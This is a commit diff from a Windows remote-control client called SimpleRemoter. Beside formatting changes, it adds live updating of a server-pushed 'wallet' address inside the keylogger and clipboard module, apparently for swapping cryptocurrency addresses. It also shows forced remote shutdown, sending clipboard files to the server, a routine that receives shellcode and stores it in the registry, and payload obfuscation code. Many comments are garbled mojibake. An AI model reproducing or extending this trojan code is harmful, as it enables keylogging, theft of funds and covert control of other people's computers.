admin/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fix: No need to restart client to update wallet address

Browse Source
This commit is contained in:
yuanyuanxiang
2025-11-09 00:49:34 +08:00
parent b9c5a7af91
commit ce825cffb1
24 changed files with 544 additions and 491 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
client/IOCPClient.cpp
View File

@@ -428,8 +428,8 @@ VOID IOCPClient::OnServerReceiving(CBuffer* m_CompressedBuffer, char* szBuffer,
HeaderEncType encType = HeaderEncUnknown;
FlagType flagType = CheckHead(szPacketFlag, encType);
if (flagType == FLAG_UNKNOWN) {
Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s'. Mask: %d, Skip: %d.\n",
szPacketFlag, maskType, ret);
Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s'. Mask: %d, Skip: %d.\n",
szPacketFlag, maskType, ret);
m_CompressedBuffer->ClearBuffer();
break;
}

6
client/IOCPClient.h
View File

@@ -171,11 +171,13 @@ public:
m_nHostPort = uPort;
}
std::string ServerIP() const {
std::string ServerIP() const
{
return m_sCurIP;
}
int ServerPort() const {
int ServerPort() const
{
return m_nHostPort;
}

57
client/KernelManager.cpp
View File

@@ -365,32 +365,33 @@ BOOL IsRunningAsAdmin()
return isAdmin;
}
bool EnableShutdownPrivilege() {
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
bool EnableShutdownPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
// 打开当前进程的令牌
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return false;
}
// 打开当前进程的令牌
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return false;
}
// 获取关机权限的 LUID
if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid)) {
CloseHandle(hToken);
return false;
}
// 获取关机权限的 LUID
if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid)) {
CloseHandle(hToken);
return false;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// 启用关机权限
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
CloseHandle(hToken);
return false;
}
// 启用关机权限
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
CloseHandle(hToken);
return false;
}
CloseHandle(hToken);
return true;
CloseHandle(hToken);
return true;
}
VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
@@ -411,18 +412,17 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
Mprintf("收到机器管理命令: %d, %d\n", szBuffer[0], szBuffer[1]);
break;
#endif
switch (szBuffer[1])
{
switch (szBuffer[1]) {
case MACHINE_LOGOUT: {
ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
break;
}
case MACHINE_SHUTDOWN: {
ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
break;
}
case MACHINE_REBOOT: {
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
break;
}
default:
@@ -583,9 +583,12 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
case CMD_MASTERSETTING:
if (ulLength > sizeof(MasterSettings)) {
memcpy(&m_settings, szBuffer + 1, sizeof(MasterSettings));
// Remark 打开键盘记录或下一次启动客户端才会生效
iniFile cfg(CLIENT_PATH);
cfg.SetStr("settings", "wallet", m_settings.WalletAddress);
CManager* pMgr = (CManager*)m_hKeyboard->user;
if (pMgr) {
pMgr->UpdateWallet(m_settings.WalletAddress);
}
}
break;
case COMMAND_KEYBOARD: { //键盘记录

7
client/KeyboardManager.cpp
View File

@@ -80,6 +80,13 @@ void CKeyboardManager1::Notify()
WaitForDialogOpen();
}
void CKeyboardManager1::UpdateWallet(const std::string& wallet)
{
m_mu.Lock();
m_Wallet = StringToVector(wallet, ';', MAX_WALLET_NUM);
m_mu.Unlock();
}
void CKeyboardManager1::OnReceive(LPBYTE lpBuffer, ULONG nSize)
{
if (lpBuffer[0] == COMMAND_NEXT)

1
client/KeyboardManager.h
View File

@@ -228,6 +228,7 @@ public:
CKeyboardManager1(IOCPClient*pClient, int offline, void* user=NULL);
virtual ~CKeyboardManager1();
virtual void Notify();
virtual void UpdateWallet(const std::string& wallet);
virtual void OnReceive(LPBYTE lpBuffer, ULONG nSize);
static DWORD WINAPI Clipboard(LPVOID lparam);
static DWORD WINAPI KeyLogger(LPVOID lparam);

18
client/LoginServer.cpp
View File

@@ -262,16 +262,16 @@ std::string GetCurrentExeVersion()
}
std::string GetCurrentUserNameA() {
char username[256];
DWORD size = sizeof(username);
std::string GetCurrentUserNameA()
{
char username[256];
DWORD size = sizeof(username);
if (GetUserNameA(username, &size)) {
return std::string(username);
}
else {
return "Unknown";
}
if (GetUserNameA(username, &size)) {
return std::string(username);
} else {
return "Unknown";
}
}
LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, const CONNECT_ADDRESS& conn)

1
client/Manager.h
View File

@@ -53,6 +53,7 @@ public:
return m_ClientObject ? m_ClientObject->Reconnect(this) : FALSE;
}
virtual void Notify() { }
virtual void UpdateWallet(const std::string &wallet) { }
BOOL Send(LPBYTE lpData, UINT nSize);
BOOL SendData(LPBYTE lpData, UINT nSize)
{

135
client/ScreenManager.cpp
View File

@@ -30,16 +30,30 @@
#pragma comment(lib, "FileUpload_Libx64.lib")
#endif
#else
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs) { return 0; }
int UninitFileUpload() { return 0; }
std::vector<std::string> GetClipboardFiles() { return{}; }
bool GetCurrentFolderPath(std::string& outDir) { return false; }
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs)
{
return 0;
}
int UninitFileUpload()
{
return 0;
}
std::vector<std::string> GetClipboardFiles()
{
return{};
}
bool GetCurrentFolderPath(std::string& outDir)
{
return false;
}
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac) {
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac)
{
finish(user);
return 0;
}
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac) {
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac)
{
return 0;
}
#endif
@@ -311,41 +325,46 @@ CScreenManager::~CScreenManager()
m_ScreenSpyObject = NULL;
}
void RunFileReceiver(CScreenManager *mgr, const std::string &folder) {
void RunFileReceiver(CScreenManager *mgr, const std::string &folder)
{
auto start = time(0);
Mprintf("Enter thread RunFileReceiver: %d\n", GetCurrentThreadId());
IOCPClient* pClient = new IOCPClient(mgr->g_bExit, true, MaskTypeNone, mgr->m_conn->GetHeaderEncType());
if (pClient->ConnectServer(mgr->m_ClientObject->ServerIP().c_str(), mgr->m_ClientObject->ServerPort())) {
pClient->setManagerCallBack(mgr, CManager::DataProcess);
// <20><><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC>׼<EFBFBD><D7BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
char cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
pClient->Send2Server(cmd, sizeof(cmd));
pClient->RunEventLoop(TRUE);
}
IOCPClient* pClient = new IOCPClient(mgr->g_bExit, true, MaskTypeNone, mgr->m_conn->GetHeaderEncType());
if (pClient->ConnectServer(mgr->m_ClientObject->ServerIP().c_str(), mgr->m_ClientObject->ServerPort())) {
pClient->setManagerCallBack(mgr, CManager::DataProcess);
// <20><><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC>׼<EFBFBD><D7BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
char cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
pClient->Send2Server(cmd, sizeof(cmd));
pClient->RunEventLoop(TRUE);
}
delete pClient;
Mprintf("Leave thread RunFileReceiver: %d. Cost: %d s\n", GetCurrentThreadId(), time(0)-start);
}
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size) {
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size)
{
IOCPClient* pClient = (IOCPClient*)user;
if (!pClient->IsConnected() || !pClient->Send2Server((char*)data, size)) {
return false;
}
return true;
if (!pClient->IsConnected() || !pClient->Send2Server((char*)data, size)) {
return false;
}
return true;
}
void RecvData(void* ptr) {
void RecvData(void* ptr)
{
FileChunkPacket* pkt = (FileChunkPacket*)ptr;
}
void delay_destroy(IOCPClient* pClient, int sec) {
if (!pClient) return;
Sleep(sec * 1000);
void delay_destroy(IOCPClient* pClient, int sec)
{
if (!pClient) return;
Sleep(sec * 1000);
delete pClient;
}
void FinishSend(void* user) {
void FinishSend(void* user)
{
IOCPClient* pClient = (IOCPClient*)user;
std::thread(delay_destroy, pClient, 15).detach();
}
@@ -372,17 +391,16 @@ VOID CScreenManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
break;
}
case COMMAND_SCREEN_GET_CLIPBOARD: {
auto files = GetClipboardFiles();
if (!files.empty())
{
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
BYTE szBuffer[1] = { COMMAND_GET_FOLDER };
auto files = GetClipboardFiles();
if (!files.empty()) {
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
BYTE szBuffer[1] = { COMMAND_GET_FOLDER };
SendData(szBuffer, sizeof(szBuffer));
break;
}
}
SendClientClipboard();
break;
}
@@ -393,36 +411,34 @@ VOID CScreenManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
case COMMAND_GET_FOLDER: {
std::string folder;
if (GetCurrentFolderPath(folder)) {
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
if (OpenClipboard(nullptr))
{
if (OpenClipboard(nullptr)) {
EmptyClipboard();
CloseClipboard();
}
CloseClipboard();
}
std::thread(RunFileReceiver, this, folder).detach();
}
break;
}
case COMMAND_GET_FILE: {
case COMMAND_GET_FILE: {
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
auto files = GetClipboardFiles();
auto files = GetClipboardFiles();
std::string dir = (char*)(szBuffer + 1);
if (!files.empty() && !dir.empty()) {
IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn->GetHeaderEncType());
if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) {
if (!files.empty() && !dir.empty()) {
IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn->GetHeaderEncType());
if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) {
std::thread(FileBatchTransferWorker, files, dir, pClient, ::SendData, ::FinishSend,
m_hash, m_hmac).detach();
}
else {
m_hash, m_hmac).detach();
} else {
delete pClient;
}
}
break;
}
}
break;
}
case COMMAND_SEND_FILE: {
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
int n = RecvFileChunk((char*)szBuffer, ulLength, m_conn, RecvData, m_hash, m_hmac);
@@ -444,12 +460,11 @@ VOID CScreenManager::UpdateClientClipboard(char *szBuffer, ULONG ulLength)
if (hGlobal != NULL) {
LPTSTR szClipboardVirtualAddress = (LPTSTR) GlobalLock(hGlobal);
if (szClipboardVirtualAddress == NULL)
{
GlobalFree(hGlobal);
CloseClipboard();
return;
}
if (szClipboardVirtualAddress == NULL) {
GlobalFree(hGlobal);
CloseClipboard();
return;
}
memcpy(szClipboardVirtualAddress, szBuffer, ulLength);
szClipboardVirtualAddress[ulLength] = '\0';
GlobalUnlock(hGlobal);

3
client/ScreenManager.h
View File

@@ -48,7 +48,8 @@ public:
std::string m_hash;
std::string m_hmac;
CONNECT_ADDRESS *m_conn = nullptr;
void SetConnection(CONNECT_ADDRESS* conn){
void SetConnection(CONNECT_ADDRESS* conn)
{
m_conn = conn;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

158
client/main.c
View File

@@ -91,16 +91,17 @@ int GetIPAddress(const char* hostName, char* outIpBuffer, int bufferSize)
return 0;
}
bool WriteRegistryString(const char* path, const char* keyName, const char* value) {
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_SZ,(const BYTE*)value,(DWORD)(strlen(value) + 1));
bool WriteRegistryString(const char* path, const char* keyName, const char* value)
{
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_SZ,(const BYTE*)value,(DWORD)(strlen(value) + 1));
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
}
char* ReadRegistryString(const char* subKey, const char* valueName)
@@ -126,88 +127,91 @@ char* ReadRegistryString(const char* subKey, const char* valueName)
return data;
}
bool WriteAppSettingBinary(const char* path, const char* keyName, const void* data, DWORD dataSize) {
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
bool WriteAppSettingBinary(const char* path, const char* keyName, const void* data, DWORD dataSize)
{
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_BINARY,(const BYTE*)data,dataSize);
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
}
bool ReadAppSettingBinary(const char* path, const char* keyName, BYTE* outDataBuf, DWORD* dataSize) {
HKEY hKey;
LONG result = RegOpenKeyExA(HKEY_CURRENT_USER,path,0,KEY_READ,&hKey);
if (result != ERROR_SUCCESS) {
*dataSize = 0;
return false;
}
bool ReadAppSettingBinary(const char* path, const char* keyName, BYTE* outDataBuf, DWORD* dataSize)
{
HKEY hKey;
LONG result = RegOpenKeyExA(HKEY_CURRENT_USER,path,0,KEY_READ,&hKey);
if (result != ERROR_SUCCESS) {
*dataSize = 0;
return false;
}
DWORD type = 0;
DWORD requiredSize = 0;
result = RegQueryValueExA(hKey,keyName,NULL,&type,NULL,&requiredSize);
if (result != ERROR_SUCCESS || type != REG_BINARY || requiredSize == 0 || requiredSize > *dataSize) {
*dataSize = 0;
RegCloseKey(hKey);
return false;
}
DWORD type = 0;
DWORD requiredSize = 0;
result = RegQueryValueExA(hKey,keyName,NULL,&type,NULL,&requiredSize);
if (result != ERROR_SUCCESS || type != REG_BINARY || requiredSize == 0 || requiredSize > *dataSize) {
*dataSize = 0;
RegCloseKey(hKey);
return false;
}
result = RegQueryValueExA(hKey,keyName,NULL,NULL,outDataBuf,&requiredSize);
RegCloseKey(hKey);
if (result == ERROR_SUCCESS) {
*dataSize = requiredSize;
return true;
}
result = RegQueryValueExA(hKey,keyName,NULL,NULL,outDataBuf,&requiredSize);
RegCloseKey(hKey);
if (result == ERROR_SUCCESS) {
*dataSize = requiredSize;
return true;
}
*dataSize = 0;
return false;
*dataSize = 0;
return false;
}
#define MD5_DIGEST_LENGTH 16
const char* CalcMD5FromBytes(const BYTE* data, DWORD length) {
static char md5String[MD5_DIGEST_LENGTH * 2 + 1]; // 32 hex chars + '\0'
if (data == NULL || length == 0) {
memset(md5String, 0, sizeof(md5String));
return md5String;
}
HCRYPTPROV hProv = 0;
HCRYPTHASH hHash = 0;
BYTE hash[MD5_DIGEST_LENGTH];
DWORD hashLen = sizeof(hash);
const char* CalcMD5FromBytes(const BYTE* data, DWORD length)
{
static char md5String[MD5_DIGEST_LENGTH * 2 + 1]; // 32 hex chars + '\0'
if (data == NULL || length == 0) {
memset(md5String, 0, sizeof(md5String));
return md5String;
}
HCRYPTPROV hProv = 0;
HCRYPTHASH hHash = 0;
BYTE hash[MD5_DIGEST_LENGTH];
DWORD hashLen = sizeof(hash);
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
return NULL;
}
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
return NULL;
}
if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptHashData(hHash, data, length, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptHashData(hHash, data, length, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
// 转换为十六进制字符串
for (DWORD i = 0; i < hashLen; ++i) {
sprintf(&md5String[i * 2], "%02x", hash[i]);
}
md5String[MD5_DIGEST_LENGTH * 2] = '\0';
// 转换为十六进制字符串
for (DWORD i = 0; i < hashLen; ++i) {
sprintf(&md5String[i * 2], "%02x", hash[i]);
}
md5String[MD5_DIGEST_LENGTH * 2] = '\0';
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return md5String;
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return md5String;
}
const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut)
@@ -350,8 +354,8 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut)
*sizeOut = binSize - 22;
const char* md5 = CalcMD5FromBytes((BYTE*)buffer + 22, *sizeOut);
if (strcmp(md5, hash)==0) {
Mprintf("Read data from registry succeed: %d bytes\n", *sizeOut);
return buffer;
Mprintf("Read data from registry succeed: %d bytes\n", *sizeOut);
return buffer;
}
}
// Registry data is incorrect

2
common/commands.h
View File

@@ -269,7 +269,7 @@ enum {
};
enum MachineCommand {
MACHINE_LOGOUT,
MACHINE_LOGOUT,
MACHINE_SHUTDOWN,
MACHINE_REBOOT,
};

21
common/file_upload.h
View File

@@ -4,15 +4,14 @@
#include <vector>
#pragma pack(push, 1)
struct FileChunkPacket
{
unsigned char cmd; // COMMAND_SEND_FILE
uint32_t fileIndex; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
uint32_t totalNum; // <20>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
uint64_t fileSize; // <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>С
uint64_t offset; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>е<EFBFBD>ƫ<EFBFBD><EFBFBD>
uint64_t dataLength; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݳ<EFBFBD><EFBFBD><EFBFBD>
uint64_t nameLength; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȣ<EFBFBD><C8A3><EFBFBD><EFBFBD><EFBFBD> '\0'<27><>
struct FileChunkPacket {
unsigned char cmd; // COMMAND_SEND_FILE
uint32_t fileIndex; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
uint32_t totalNum; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
uint64_t fileSize; // <20><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD>С
uint64_t offset; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>е<EFBFBD>ƫ<EFBFBD><EFBFBD>
uint64_t dataLength; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݳ<EFBFBD><EFBFBD><EFBFBD>
uint64_t nameLength; // <20>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> '\0'<EFBFBD><EFBFBD>
};
#pragma pack(pop)
@@ -28,7 +27,7 @@ typedef bool (*OnTransform)(void* user, FileChunkPacket* chunk, unsigned char* d
typedef void (*OnFinish)(void* user);
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac);
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac);
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac);

12
common/locker.h
View File

@@ -90,18 +90,18 @@ public:
class CAutoCLock
{
private:
CLock& m_cs;
CLock& m_cs;
public:
CAutoCLock(CLock& cs) : m_cs(cs)
{
{
m_cs.Lock();
}
}
~CAutoCLock()
{
~CAutoCLock()
{
m_cs.Unlock();
}
}
};
// 智能计时器,计算函数的耗时

10
common/logger.h
View File

@@ -114,11 +114,11 @@ public:
}
cv.notify_one();
if (workerThread.joinable()) {
try {
workerThread.join();
} catch (const std::system_error& e) {
printf("Join failed: %s [%d]\n", e.what(), e.code().value());
}
try {
workerThread.join();
} catch (const std::system_error& e) {
printf("Join failed: %s [%d]\n", e.what(), e.code().value());
}
}
for (int i = 0; threadRun && i++ < 1000; Sleep(1));
}

139
common/obfs.h
View File

@@ -5,89 +5,98 @@
#include <stddef.h>
#pragma once
class ObfsBase {
class ObfsBase
{
public:
bool m_bGenCArray;
ObfsBase(bool genCArray = true) : m_bGenCArray(genCArray) { }
virtual ~ObfsBase() { }
bool m_bGenCArray;
ObfsBase(bool genCArray = true) : m_bGenCArray(genCArray) { }
virtual ~ObfsBase() { }
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
virtual bool WriteFile(const char* filename, uint8_t* data, size_t length, const char* arrayName) {
return m_bGenCArray ? WriteBinaryAsCArray(filename, data, length, arrayName) : WriteBinaryFile(filename, data, length);
}
virtual bool WriteFile(const char* filename, uint8_t* data, size_t length, const char* arrayName)
{
return m_bGenCArray ? WriteBinaryAsCArray(filename, data, length, arrayName) : WriteBinaryFile(filename, data, length);
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> C <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽд<CABD><D0B4><EFBFBD>ļ<EFBFBD>
virtual bool WriteBinaryAsCArray(const char* filename, uint8_t* data, size_t length, const char* arrayName) {
FILE* file = fopen(filename, "w");
if (!file) return false;
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> C <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽд<CABD><D0B4><EFBFBD>ļ<EFBFBD>
virtual bool WriteBinaryAsCArray(const char* filename, uint8_t* data, size_t length, const char* arrayName)
{
FILE* file = fopen(filename, "w");
if (!file) return false;
fprintf(file, "unsigned char %s[] = {\n", arrayName);
for (size_t i = 0; i < length; ++i) {
if (i % 24 == 0) fprintf(file, " ");
fprintf(file, "0x%02X", data[i]);
if (i != length - 1) fprintf(file, ",");
if ((i + 1) % 24 == 0 || i == length - 1) fprintf(file, "\n");
else fprintf(file, " ");
}
fprintf(file, "};\n");
fprintf(file, "unsigned int %s_len = %zu;\n", arrayName, length);
fprintf(file, "unsigned char %s[] = {\n", arrayName);
for (size_t i = 0; i < length; ++i) {
if (i % 24 == 0) fprintf(file, " ");
fprintf(file, "0x%02X", data[i]);
if (i != length - 1) fprintf(file, ",");
if ((i + 1) % 24 == 0 || i == length - 1) fprintf(file, "\n");
else fprintf(file, " ");
}
fprintf(file, "};\n");
fprintf(file, "unsigned int %s_len = %zu;\n", arrayName, length);
fclose(file);
return true;
}
fclose(file);
return true;
}
// ʹ<><CAB9> "wb" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4>ģʽ
virtual bool WriteBinaryFile(const char* filename, const uint8_t* data, size_t length) {
FILE* file = fopen(filename, "wb");
if (!file) return false;
// ʹ<><CAB9> "wb" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4>ģʽ
virtual bool WriteBinaryFile(const char* filename, const uint8_t* data, size_t length)
{
FILE* file = fopen(filename, "wb");
if (!file) return false;
size_t written = fwrite(data, 1, length, file);
fclose(file);
size_t written = fwrite(data, 1, length, file);
fclose(file);
return written == length;
}
return written == length;
}
};
class Obfs : public ObfsBase {
class Obfs : public ObfsBase
{
private:
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t rol8(uint8_t val, int shift) {
return (val << shift) | (val >> (8 - shift));
}
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t rol8(uint8_t val, int shift)
{
return (val << shift) | (val >> (8 - shift));
}
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t ror8(uint8_t val, int shift) {
return (val >> shift) | (val << (8 - shift));
}
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t ror8(uint8_t val, int shift)
{
return (val >> shift) | (val << (8 - shift));
}
public:
Obfs(bool genCArray = true) : ObfsBase(genCArray) { }
Obfs(bool genCArray = true) : ObfsBase(genCArray) { }
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {
uint32_t state = seed;
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed)
{
uint32_t state = seed;
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
buf[i] = rol8(buf[i] ^ mask, 3); // <20><><EFBFBD><EFBFBD>+<2B><>ת<EFBFBD><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
state = state * 2654435761u + buf[i]; // LCG + <20><><EFBFBD><EFBFBD><EFBFBD>Ŷ<EFBFBD>
}
}
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
